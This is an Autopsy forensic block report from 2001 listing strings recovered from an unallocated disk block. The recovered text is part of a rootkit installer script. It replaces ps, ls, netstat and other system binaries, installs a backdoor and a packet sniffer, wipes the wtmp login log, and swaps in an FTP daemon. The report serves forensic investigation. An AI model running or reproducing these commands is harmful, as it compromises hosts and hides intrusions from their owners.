autopsy string Block Report (ver 0.1b)

 ------------------------------------------------------
Block: 96118
Not allocated to any inodes
MD5 of raw block: 4fbd7ddae5096d53be144b828effde83
MD5 of string output: 43d02b3fce6eb2278bdd205850e0a912
Device: /usr/proj/forensics/morgue/hda8_root
Date Generated: Fri Feb 16 13:03:09 2001
Investigator: Brian Carrier
 ------------------------------------------------------
ng in progress"
./fix /bin/ps ps
./fix /usr/bin/top top
./fix /usr/sbin/syslogd syslogd
./fix /bin/ls ls
./fix /sbin/ifconfig ifconfig
./fix /bin/netstat netstat
./fix /usr/sbin/tcpd tcpd
./fix /usr/sbin/in.identd in.identd
killall -HUP syslogd
./addbd
./snif &
echo "Sniffer ENABLED"
echo "running clean and a.sh"
./clean
./a.sh
mv ptyp /dev
gunzip rpms.tgz;tar -xvf rpms.tar;cd rpms;rpm -Uvh --force *.rpm;cd ..;rm -rf rpms*
killall -1 lpd
rm -rf /var/log/wtmp
cd /var/log
touch wtmp
cd /usr/man/.Ci
rm -rf install addbd
killall -HUP inetd
cp bx /bin/
chmod 755 /bin/bx
rm /usr/sbin/in.ftpd
mv in.ftpd /usr/sbin/
chmod +x /usr/sbin/in.ftpd
echo "done with installing shit"
echo "i'll now run whereis sshd"
echo "if nothing shows up then run ./install-sshd"
echo "if it's in /usr/local/sbin/sshd then run ./install-sshd"
echo "if it's in /usr/sbin/sshd then run ./install-sshd1"
whereis sshd
echo "after successfully installing sshd, run ./do"
echo "rootkit installation complete."